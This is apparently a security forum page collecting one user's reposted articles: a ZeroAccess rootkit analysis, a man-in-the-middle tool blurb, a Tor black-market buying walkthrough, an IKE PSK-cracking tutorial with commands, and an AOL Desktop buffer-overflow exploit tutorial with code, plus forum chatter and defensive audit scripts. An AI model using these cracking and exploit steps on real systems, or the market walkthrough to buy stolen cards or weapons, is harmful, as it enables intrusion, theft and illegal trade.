Everything posted by Nytro

  1. [h=1]Targeting ZeroAccess Rootkit’s Achilles’ Heel[/h]
Monday, April 30, 2012 at 4:17pm by Aditya Kapoor

[h=2]Proliferation[/h]
ZeroAccess is one of the most talked and blogged [1], [2] about rootkits in recent times. It is also one of the most complex and highly prevalent rootkits we have encountered and which is still continuing to evolve. The ZeroAccess rootkit is distributed via both social engineering as well as exploitation. A recent blog post by our colleagues at McAfee describes some of the odd methods this rootkit adopts to get installed on machines without getting noticed. One of the goals of this rootkit is to create a powerful peer-to-peer botnet, which is capable of downloading additional malware on the infected system. This botnet is reportedly [3] involved in clickfraud, downloading rogue antivirus applications, and generating spam.

This Google map of the United States shows McAfee VirusScan consumer nodes reporting unique ZeroAccess detection over the past week. Our consumer data for the past month shows close to 4,000 unique systems detecting ZeroAccess daily. And the trend is continuing upward.

[h=2]Installation[/h]
In my recent analysis of this rootkit, I was looking to understand the initial installation mechanism. The installation of ZeroAccess involves overwriting a legitimate driver on disk with the malicious rootkit driver. Usually Step 1 varies in different variants, i.e. some variants would directly overwrite a legitimate driver and some others would first inject the malicious code in trusted processes like explorer.exe and then, from the injected code, overwrite the driver (this is done to bypass various security products and to make analysis more challenging). During Step 1, the original driver code is kept in memory. The driver, which is overwritten in Step 2, is randomly selected (details here [1]); in our discussion below we assume CDROM.sys is being overwritten. Step 2 to Step 8 are fairly static in variants of ZeroAccess.
Once the driver is overwritten by malicious code it is loaded in kernel space. The first task of the kernel mode code is to ensure that it sets up the malware to survive reboots and to forge the view of the overwritten driver (CDROM.sys). Let's move on to see how this scheme works in Step 5 – Step 8.

In Step 5, ZeroAccess intercepts disk i/o by hooking the DeviceExtension->LowerDeviceObject field in the \driver\disk DEVICE_OBJECT. So now any disk i/o would go through the rootkit’s malicious routine.

In Step 6, the kernel mode code has access to the clean image of the CDROM.sys driver stored in memory, and to survive reboots it flushes the file to disk using the ZwFlushVirtualMemory API. The request to flush the clean image is interestingly sent to the file CDROM.sys, which at first glance looks counterintuitive. Why would the rootkit want to write the clean image to the file it just infected in Step 2? Looking more closely, the rootkit actually uses its disk i/o redirection framework. So, when this request to store the clean image of the file on disk traverses through the virtual driver stack shown in Step 7, it is encrypted and redirected (Step 8) to the rootkit's “protected” folder that it created in Step 3, instead of going to the actual CDROM.sys.

Once the original encrypted image of CDROM.sys is stored in the protected folder, the infection becomes persistent and can easily survive reboots. Any attempt to read the infected CDROM.sys would have to traverse the hijacked i/o path, where the rootkit decrypts the original file from its protected storage on the fly and presents the clean image, thus forging the view of the file to security tools. Also, during reboot the infected file would first load the malicious code in kernel, which can refer to its “protected” folder and load the original file in kernel, thus ensuring uninterrupted functionality of the original device.
In order to clean this threat, security tools have to take several steps in repairing either memory or decrypting the files in its protected folder so that they can restore the original file. Also, once the rootkit is active in kernel mode it takes a lot of evasive steps to kill or circumvent the security tools, as described by our colleagues in this Virus Bulletin article. So repair becomes even more challenging and research costly.

[h=2]Impact of real time kernel monitoring[/h]
I tested many variants spanning over a year of this rootkit family against McAfee’s Deep Defender technology, which provides real time protections against unauthorized kernel memory modifications. The following screenshot shows Deep Defender blocking the DeviceExtension hijack attempt in Step 5, which was critical to the rootkit's survival. Once this hook is blocked the machine was cleaned after a reboot, without any fancy repairs, and it actually shaved off days of reverse engineering and writing custom repair against this rootkit and its multiple variants. It seems as if Deep Defender hit right in the Achilles heel of the rootkit.

[h=2]Is that it? How did Deep Defender clean the machine?[/h]
No, you did not miss part of the article; the interesting part is that Deep Defender did not have to do any custom repairs to clean this threat. It just blocked in real time the core functionality of the rootkit. Let's revisit the attack strategy to understand what happened. When the rootkit attempted to hijack the DeviceExtension pointer in Step 5, Deep Defender’s real time kernel memory protection saw the attempted change, recognized it as a malicious attempt to modify a critical structure, and blocked the hijack attempt. With the hook gone, the rootkit could not hijack the disk i/o path, which means it cannot store any files in its “protected” folder anymore and could not survive any reboots without getting noticed. It certainly cannot forge the view of the file anymore as well.
But the most interesting part is that the attempted hijack block by Deep Defender actually redirected the rootkit’s write attempt in Step 7 to go to its original location. So Step 8 would actually overwrite the original file that it just infected from user mode, thus forcing the rootkit to clean up for us. After a reboot the system will be back in the clean state. This strategy from Deep Defender works against all the current ZeroAccess variants. It would be challenging for the rootkit authors to fully bypass this defense without either leaving the system in a corrupted state or being noticed by the security tools, which would catch them red-handed if they cannot forge the view of the file anymore.

Source: Targeting ZeroAccess Rootkit’s Achilles’ Heel | Blog Central
  2. [h=1]Subterfuge - Man-in-the-Middle Attack Framework Tutorial[/h]
By Irfan Shakeel

Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions.

Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool.

The video below shows you how to configure Subterfuge on your computer. The operating system shown in the video is BackTrack 5, but you can install Subterfuge on other Linux distributions because Subterfuge installs its dependencies by itself. So this is a small video in the Subterfuge tutorial; I will show you how to perform the various attacks. Do not forget to comment about this wonderful tool and do not forget to share your experiences regarding the framework.

Source: Subterfuge - Man-in-the-Middle Attack Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  3. [h=1]How online black markets work[/h]
[h=2]Corporate investigator Brandon Gregg looks at how bitcoins and Tor make ********* black markets tick[/h]
[h=3]By Brandon Gregg, CPP[/h]
April 30, 2012 — CSO — The internet is no stranger to crime. From counterfeit and stolen products, to illegal drugs, stolen identities and weapons, nearly anything can be purchased online with a few clicks of the mouse. The online black market not only can be accessed by anyone with an Internet connection, but the whole process of ordering illicit goods and services is alarmingly easy and *********, with multiple marketplaces to buy or sell anything you want. Understanding how the market thrives—unregulated and untraceable—can give you a better sense of the threats (or resources) that affect you and your business.

In our scenario we are going to legally transfer $1,000 USD out of a regular bank account and into a mathematical system of binary codes, and then enter a neighborhood of the Internet largely used by criminals. This hidden world lets anyone purchase bulk downloads of stolen credit cards, as well as a credit card writer, blank cards, some "on stage" fake identities—and maybe even a grenade launcher they've had their eyes on. A journey into the darker side of the Internet starts with two open-source programs: Bitcoin and the Tor Bundle.

[h=3]Moving Money[/h]
Bitcoin (Bitcoin - P2P digital currency) is a system tool that will act as a personal bank for storing and investing digital currency on your computer. Once it's installed on your system, it sits empty like a piggy bank, waiting to be filled with untraceable digital cash. Getting it filled is the tricky part. The digital monetary system online is predominantly operated by the likes of Paypal, Western Union, and banking companies that try to follow government regulations to prevent fraud and money laundering.
There are two steps to legally take money and have it converted at the current Bitcoin rate into BTCs in our digital and ********* bank. Start by opening a Dwolla (www.dwolla.com) banking account with no fees. You can use your real information—you aren't doing anything illegal. In about three days you will be given a fraud test and have to identify small transfers in your Dwolla and personal bank account. Once your account is confirmed, wire any amount from your personal bank to Dwolla from a lump sum or the estimated price of your purchase you have in mind. After you confirm the transfers, your legit money will now be stored in a new global bank with less restriction than US banks.

Next you need to set up an account with the largest bitcoin exchanger, MtGox. Due to fraud concerns, MtGox will only allow transfers from banks like Dwolla. After your Dwolla transfer moves to MtGox, you can use the money to purchase Bitcoins on the open market for a small percentage-based fee. Once this sale is complete, your bitcoins are best stored in your own bank account that is residing digitally on your computer. The whole process can be completed in less than a week, and the $1,000 USD is now exchanged to $191 BTC. Now you are ready to go shopping on the black market.

[h=3]Finding Markets[/h]
The conversion of dollars to Bitcoins was legal and relatively safe. Actually engaging in black market shopping, though, connects you to various kinds of illegal activities. We'll continue our walkthrough but we are NOT endorsing these activities. This information can help security professionals understand how stolen identities and credit cards are used, how products are fenced or distributed illegally, and more.

Clearly anyone engaging in black market activity wants to remain *********. So the next step in black market shopping is to download and open the Tor Bundle Pack (https://www.torproject.org/).
We have touched on Tor two or three times to protect your identity while online, but Tor includes other functions. Developed by the US Navy for secret communications and now used to circumvent blocked websites at offices across the country and to inspire Arab Springs, TOR has a darker cousin: Hidden Tor Servers. The same random spider-web routing of Internet traffic that hides an end user's IP and location from any prying eyes can hide server locations too. Hidden Tor Servers are now the norm for storing, accessing and hiding illicit activity such as child pornography. The level of protection provided by Tor makes law enforcement's job tracking such activities next to impossible. (Interestingly, the hacktivist group ********* has recently brought attention to such evil servers by controlling them as DDOS servers against some of their targets, including law enforcement and government groups. If the CIA is struck with a DDOS attack, the agency suffers but also, in investigating the source of the attack, discovers the child pornography and hopefully cracks the pornography ring.) Hidden Tor Servers are likewise home to much black market activity.

Where does one find "the black market"? What does it look like? Of course, Google search answers these questions easily. Using your Tor browser (which, yes, is much slower than a standard browser) search for "Tor Directories". These websites offer a collection of Tor's hidden web pages for all kinds of storefronts. Here you will find websites similar to Yahoo's early days, categorizing storefronts including Drugs, Weapons and other illegal goods and activities. If the directory (or store) is listed with a standard .com or .org domain, it will open in your standard browser; if it ends in .onion then it means it's a hidden server only viewable on the Tor browser.
One example is the Nobody@Zerodays website (nobody.zerodays.org/hidden-directory/), which offers reviews and direct links to current Hidden Tor sites. In our scenario we are going to check out the Black Market Reloaded and look for the current price of some credit cards and tools. Using Tor you can quickly jump to the Black Market Reloaded website, register (no real information needed), and start shopping. As on Amazon, sellers show off their products with details, pictures and pricing, including feedback collected from past buyers.

On a given day in April, current pricing for bulk credit cards is running at $6.5 BTC with great seller feedback. One seller advertises: "All of our Products are coming with full given Information. That means: All needed information like cardnumber, security code, expiration date, name, address, city, state, zipcode, country, phone, SSN, DOB, security question etc. is given. Also Track 1+2 data and PIN. All CCs are checked and have a minimum Balance of 1000€/$, and most of them are from an EU-Country. We also have US-Cards, but it's easier to cashout the money at ATMs (/buy virtual money online/link the CC to PayPal) with european ones."

A "Credit card reader/writer, HiCo/LoCo, all ISO complete" is going for 76.60350 BTC (or $366.63 USD at the time of our exchange) and there are also a handful of unregistered handguns, including a brand new M9 Tactical handgun with an illegal silencer, unregistered of course, for 225.00000 BTC or $1,076.87 USD.

Anyone who executes these purchases via ********* bitcoins will leave no trace of the transaction. All users can send data via Hidden Tor email servers, or ship physical items like drugs and weapons with the US Postal Service to prevent any searches without a warrant. When shipments come from within the US, the illegal goods are likely to arrive at the right mailbox without incident.
For those who want an added layer of protection—say in the event that goods are being shipped from outside the US—many people in the "Services" section of this site will buy and/or receive items on your behalf using their own bitcoins and addresses, and then remail the goods to you, for a small fee. (Also, some users of these sites will offer to sell you bitcoins via Paypal so you can skip the two banking steps above and jump right into buying your goods; there is of course no guarantee that you will receive your bitcoins after giving up your cash.)

Tor's Hidden Servers provide a real insight to an underground world that once was limited to dark alleys, shady places, and dangerous criminals. Much like the Internet has expanded our e-commerce into a borderless global market, bitcoins and Tor have made shopping for illicit goods and services almost as easy as ordering an iTunes song on your computer.

As a reminder, most of the purchases described here are illegal and/or dangerous. While it's extremely difficult to identify the individuals involved without additional intel, law enforcement personnel and corporate investigators can use these processes to keep tabs on the flow of stolen, counterfeit, or diverted goods. If these transactions are being executed on your corporate network, that activity can expose your organization to legal and other risks. While network logs will not show the Tor websites, software audits for programs like TOR, network sniffing of actual traffic, computer monitoring and computer forensics can show employers who is using TOR sites and what they are doing.

Brandon Gregg is a corporate investigations manager.

Source: How online black markets work - CSO Online - Security and Risk
  4. [h=1]Zuckerberg's employees get rich from the moment they are hired. How much an inexperienced student earns at Facebook[/h]
[h=2]Facebook founder Mark Zuckerberg rewards his interns royally. Moreover, those who intern at the entrepreneur's company say they manage to save enough money in a year to afford various extravagances afterwards.[/h]
April 28, 2012 06:00 | 659 views | author: incont.ro

The average salary for an intern working on software development at Facebook is over 5,000 dollars a month, according to Business Insider. Leaving aside the taxes that interns pay to the US government, their pay comes to 60,000 dollars a year, quite a lot of money for someone with little programming experience.

What is more, some interns are even luckier. According to sources cited by Business Insider, some undergraduate or master's students interning at the social network earn as much as 6,800 dollars a month, on top of which comes a stipend for personal expenses worth 1,000 dollars. The average salary for an engineer doing programming at Facebook is 6,229 dollars, GlassDoor.com also reports.

Facebook wants to raise approximately 5 billion dollars through its stock market listing, preparing the largest initial public offering ever carried out in the IT industry, which could give it a capitalization of up to 100 billion dollars. Analysts believe investors will fight over Facebook shares in the initial public offering, but the negative signals about slowing growth could lead some of them not to become long-term shareholders. Facebook, founded in 2004 by Mark Zuckerberg, passed the threshold of 900 million monthly active users for the first time in the first quarter.
The company hired 1,100 people in the last 12 months, bringing the total number of employees to 3,539, according to filings submitted on Monday evening to the US Securities and Exchange Commission. Expenses doubled in the last 12 months, while revenue rose by only 45%, the company said. Net profit thus fell by 12% in the first quarter, to 205 million dollars, from 233 million dollars in the corresponding period of last year. Revenue totaled 1.06 billion dollars, down 6% from the fourth quarter.

Besides the slowdown in growth, Facebook also has problems related to intellectual property rights and patents. Yahoo has sued Facebook for infringing some patents, while the social network is trying to strengthen its portfolio of intellectual property rights in order to avoid future confrontations in court. Facebook announced on Monday that it will pay 550 million dollars to Microsoft for a portfolio of several hundred patents.

Source: Zuckerberg's employees get rich from the moment they are hired. How much an inexperienced student earns at Facebook - www.InCont.ro
  5. [h=3]Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain[/h]
Kislay Bhardwaj - 1:50 AM

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a VPN client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump, and start a dictionary or brute force attack against this hash to recover the PSK. This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:

$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)
192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)

To save with some output:

$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

Once you have your psk file to crack you're stuck with two options: psk-crack and Cain.

psk-crack is fairly rudimentary. To brute force:

$ psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations
no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

Default charset is "0123456789abcdefghijklmnopqrstuvwxyz"; it can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

To dictionary attack:

$ psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode
no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substitution). For this you'll need to use Cain. The problem I ran into was that Cain is a Windows tool and ike-scan is *nix. I couldn't get the Windows tool that is floating around to work. Solution... run in VMware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". It's slow as hell, but has more options than psk-crack.

Source: Kislay Bhardwaj: Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
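The aggressive-mode exposure described in the post above, turned into a check a VPN owner can run over saved ike-scan output; this is an added example, not part of the original post. The sample lines are constructed in the format quoted above, and treating 3DES, MD5 and DH groups 1 and 2 as deprecated is this example's own policy.

```python
import re

# Constructed sample: one notify, one aggressive-mode handshake, one main-mode
# handshake. Cookie values and the 192.0.2.10 gateway are illustrative.
SAMPLE = (
    "192.168.207.134\tNotify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=0000000000000001)\n"
    "192.168.207.134\tAggressive Mode Handshake returned HDR=(CKY-R=0000000000000002) "
    "SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) "
    "KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) "
    "Nonce(20 bytes) Hash(16 bytes)\n"
    "192.0.2.10\tMain Mode Handshake returned HDR=(CKY-R=0000000000000003) "
    "SA=(Enc=AES KeyLength=256 Hash=SHA1 Group=14:modp2048 Auth=PSK "
    "LifeType=Seconds LifeDuration=28800)\n"
)

HANDSHAKE_RE = re.compile(
    r"^(?P<host>\S+)\s+(?P<mode>Aggressive|Main) Mode Handshake returned\s+(?P<rest>.*)$"
)
SA_RE = re.compile(r"SA=\(([^)]*)\)")
# The HASH_R payload is printed as "Hash(N bytes)"; the SA attribute is "Hash=MD5".
HASH_PAYLOAD_RE = re.compile(r"\bHash\(\d+ bytes\)")

# Example policy (an assumption of this sketch, not taken from the post).
DEPRECATED = {
    "Enc": {"DES", "3DES"},
    "Hash": {"MD5"},
    "Group": {"1:modp768", "2:modp1024"},
}


def parse_sa(rest):
    """Return the attributes of the accepted transform as a dict."""
    match = SA_RE.search(rest)
    if not match:
        return {}
    return dict(tok.split("=", 1) for tok in match.group(1).split() if "=" in tok)


def audit(scan_output):
    """Return one finding per handshake line in saved ike-scan output."""
    findings = []
    for line in scan_output.splitlines():
        match = HANDSHAKE_RE.match(line.strip())
        if not match:
            continue  # banner, notify or summary line
        sa = parse_sa(match["rest"])
        issues = []
        # The case the post describes: aggressive mode with PSK authentication
        # returns the authentication hash unencrypted to any initiator.
        if (match["mode"] == "Aggressive" and sa.get("Auth") == "PSK"
                and HASH_PAYLOAD_RE.search(match["rest"])):
            issues.append("psk-hash-exposed")
        for attr, bad in DEPRECATED.items():
            if sa.get(attr) in bad:
                issues.append("deprecated-%s:%s" % (attr.lower(), sa[attr]))
        findings.append({"host": match["host"], "mode": match["mode"], "issues": issues})
    return findings


def exhaust_seconds(alphabet_size, length, guesses_per_second):
    """Worst-case time to try every key of exactly `length` characters."""
    return alphabet_size ** length / guesses_per_second


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
    # Rate taken from the psk-crack run quoted in the post (438099.56 guesses/sec).
    print("5 chars of [0-9a-z]: %.1f s" % exhaust_seconds(36, 5, 438099.56))
    print("20 chars of 62 symbols: %.3e s" % exhaust_seconds(62, 20, 438099.56))
```

A gateway that shows up with `psk-hash-exposed` should be moved to main mode or certificate authentication, or at minimum given a long random PSK; the last two lines show how quickly the search time grows with key length at the rate quoted in the post.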
  6. [h=3]Exploit writing: A basic Idea.[/h]
Kislay Bhardwaj - 1:59 PM

Exploit Writing Made Easier With !pvefindaddr

A few notes before we begin, covering what this paper is about and what it isn’t about:
   1. This paper is intended to demonstrate the efficiency of !pvefindaddr.
   2. This paper will not explain the exploit till the end, if you want the full exploit go here: http:// AOL Desktop 9.6 .rtx Buffer Overflow

Now let’s start!

Required software:
   - Immunity Debugger
   - !pvefindaddr
   - AOL Desktop v9.6

Required knowledge:
   - Understanding how buffer overflows work.
   - Exploiting techniques.
   - A programming language (I use python).

I’ve heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated or when trying to test multiple dll’s for SAFESEH or ASLR, that’s where !pvefindaddr comes in.

What is !pvefindaddr !? Well, in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit. Here is some helpful information on how to install !pvefindaddr and some basic usage.

Ok, let us get started ! Install AOL Desktop v9.6 (A quick note here, if the app doesn’t work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes then run the app).
Now let’s make the exploit skeleton (I won’t remake the full exploit, if you want to check it out it’s on the top of the page), it will contain two standard headers and between them our buffer, let’s check it out:

****************************************
#!/usr/bin/python
# The First Header
hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
"\x68\x74\x74\x70\x3a\x2f\x2f")
# The Second Header
hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
"\x48\x54\x4d\x4c\x3e\x0d\x0a")
payload='\x90'* 6000
exploit = hd1+payload+hd2
try:
    file=open('exploit.rtx','w')
    file.write(exploit)
    file.close()
    print 'File created, time to PEW PEW!\n'
except:
    print 'Something went wrong!\n'
    print 'Check if you have permisions to write in that folder, of if the folder exists!'
****************************************

Generate the file using the exploit and after that open it in AOL Desktop and as we can see we could overwrite EIP with our ‘\x90’’s:

So what would be next ? Calculating the exact offset until EIP overwrite. (NOTE: Before we go on, restart AOL and attach it again). In our debugger we can either click on the PyCommands button and select !pvefindaddr from the list and then enter the arguments, or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger like this:

As you can see it said “check mspattern.txt” so we go in the Immunity Debugger folder and open up mspattern.txt, copy the pattern in our exploit and regenerate the malicious file.
After opening the malicious file containing our pattern:

We can see that our EIP is 35784734 and we also can see that ESI points in our buffer, now in order to determine the exact offset we will use another feature from !pvefindaddr. Normally with metasploit we would try pattern_offset EIP now, well with !pvefindaddr we can actually get more info, let’s try the findmsp function. After it is done just open the Log Windows and as we can see, we have some nice information:

So it found the first characters from the pattern in davclnt.dll, then it checked register addresses, we have the EIP overwrite address beginning at 5384 and the register which points into the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368, it even checked the SEH chains to see if it finds the pattern there, and we also have the “Walking stack” which, if you haven’t guessed by now, actually tells us when the ESP contains a pointer to our buffer at the position 4360.

This is a nice feature but we have one that does even better, !pvefindaddr also has a function that runs a findmsp and after that, based on the results and on the stack, it actually gives us information about the type of exploit and how it should be made, let’s check it out.

!pvefindaddr suggest

Sweet huh ? Now we have the exact offset before the EIP overwrite, we know that ESI points to our buffer, the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. Now these are simple instructions, we can find them, but what if we want to find these instructions without null bytes, from specific modules, etc. (NOTE: I’m not saying this can’t be done manually, only saying that it will take more time and this way it’s much easier).
Let’s say we want to make this exploit using a universal address (like the original exploit), searching for this instruction can take a lot of time, mostly because it’s a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules and some specific characteristics. We will use !pvefindaddr to give us a list of all modules and their characteristics, once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.:

Once we can see which modules we can use we can start searching for the specific instruction using the command:

!pvefindaddr j -r ESI -n -o

(this might take some time, go get a beer or something.)

This function searches for pointers that jump to a specific register (ESI in our case), the most common use of this function is when dealing with direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combination from non-fixup and non-aslr modules, also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (We want to make it universal). After a little search we find a nice instruction at 20C5CFC0 from aolusershell.dll, this one should work perfectly.
After we are done we can also use compare in order to compare some bytes (usually our shellcode) from a file with some bytes in memory, it also compares unicode expanded instances. Ok, now we need to make our shellcode binary (only the shellcode), we can just give the RAW output at Metasploit when making a payload and pipe it to a file like:

msfpayload windows/exec CMD=calc.exe R > shellcode

There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki:

****************************************
my $shellcode="\xcc\xcc\xcc\xcc"; #paste your shellcode here
open(FILE,">c:\\temp\\shellcode.bin");
binmode FILE;
print FILE $shellcode;
close(FILE);
****************************************

We then run the whole exploit (with the shellcode included, without any breakpoints or anything), now that the app has crashed we compare it:

!pve finder compare C:\shellcode

After it is finished we can either view the Log Windows or open compare.txt from the Immunity Debugger folder:

Now a quick review on what we managed to do in this tutorial:
   - We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer.
   - We have found our type of exploit, and some information on how to structure it
   - Found out which modules have SAFESEH, ASLR or get rebased
   - Found the instruction we needed avoiding these modules and the OS modules as well
   - Checked if our shellcode contains bad characters.

So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time.

Source: Kislay Bhardwaj: Exploit writing: A basic Idea.
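The module listing step in the post above depends on modules that do not opt in to ASLR; the same PE header field can be audited on a product's own binaries before they ship. This is an added example, not from the original post: the module names and headers are constructed, and SafeSEH (recorded in the load configuration directory rather than in this field) is not parsed here.

```python
import struct

# Bits of IMAGE_OPTIONAL_HEADER.DllCharacteristics checked by this audit.
DYNAMIC_BASE = 0x0040  # image opts in to ASLR
NX_COMPAT = 0x0100     # image opts in to DEP
REQUIRED = {DYNAMIC_BASE: "DYNAMIC_BASE", NX_COMPAT: "NX_COMPAT"}


def dll_characteristics(image):
    """Return the DllCharacteristics word of a PE32 or PE32+ image."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20  # PE signature, then the 20-byte COFF header
    if len(image) < opt + 72:
        raise ValueError("truncated optional header")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+.
    (flags,) = struct.unpack_from("<H", image, opt + 70)
    return flags


def audit(modules):
    """Map each module name to the list of mitigation flags it lacks."""
    report = {}
    for name, image in modules.items():
        flags = dll_characteristics(image)
        report[name] = [label for bit, label in REQUIRED.items() if not flags & bit]
    return report


def build_header(flags, magic=0x10B):
    """Construct a minimal PE header for the sample below (headers only)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows directly
    pe32 = magic == 0x10B
    opt_size = 0xE0 if pe32 else 0xF0
    coff = struct.pack("<HHIIIHH", 0x14C if pe32 else 0x8664, 0, 0, 0, 0,
                       opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, flags)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed sample input; hypothetical module names.
MODULES = {
    "legacy_plugin.dll": build_header(0x0000),
    "hardened.dll": build_header(DYNAMIC_BASE | NX_COMPAT, magic=0x20B),
}

if __name__ == "__main__":
    for name, missing in audit(MODULES).items():
        print(name, "OK" if not missing else "missing " + ", ".join(missing))
```

For real files, pass `open(path, "rb").read()` as the image; a build that fails this check can usually be fixed by linking with `/DYNAMICBASE` and `/NXCOMPAT`.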
  7. Computer Science @ University:

Year I, semester I:
   - Procedural programming (the C language)
   - Mathematical logic (damn Boole, rubbish)
   - Algebra (crap)
   - Analysis (even bigger crap)
   - Algorithms and data structures (sorting, trees, useful)
   - Computer architecture (what a processor looks like, interesting, ASM lab, useful)

Year I, semester II:
   - Object-oriented programming (C++, important)
   - Analysis II (crap)
   - Algebra II (crap)
   - Graph algorithms (too theoretical, lame)
   - Geometry (also crap)
   - Formal languages and automata (I don't really know what it is about)

Year II, semester I:
   - Web techniques: HTML, CSS and Javascript (practical)
   - Computational geometry (rather theoretical, I think)
   - Computability and complexity (optimizations, useful)
   - Advanced programming techniques (Java, very useful)
   - Operating systems (Linux, C++ under Linux, really cool)
   - Probability (I don't know exactly, I think it's math, so lame)

Year II, semester II:
   - Statistics (good teacher, rubbish otherwise)
   - Computer networks (Java sockets, RMI and serialization, useful)
   - Software development methods (rubbish for which you need some project)
   - Artificial intelligence (I don't know exactly, Prolog lab)
   - Logic programming (lousy professor, Maude lab, a slightly odd but interesting language)
   - Databases (theory in the lectures, Oracle lab)

That's about it for now; if you want other information, ask.
  8. begood: Is it OK like this? Is that the ID? Nemessis: We have access to the database, I don't think there will be any problems. Anyway, most of us know each other. Or what the hell, let's have a meeting of our own...
  9. SecureCRT.
  10. Sorry, access:
- 3871 = Nytro
- 989 = Zatarra
- 21017 = pyth0n3
- 13607 = begood
- 15061 = MrRip
- 1 = []kw3rln
- 528 = Nemessis
- 1348 = Ahead
- 22232 = wildchild
- 22968 = tex
Also, the private messages of those with access cannot be viewed (that's how it should be). If anyone else wants access, contact me. If there is any problem, or if you want something extra, say so.
  11. [h=1]MS11-046 Afd.sys Proof of Concept[/h]
/*
MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S .
Ronnie Johndas wrote the writeup dissecting a malware with this exploit .
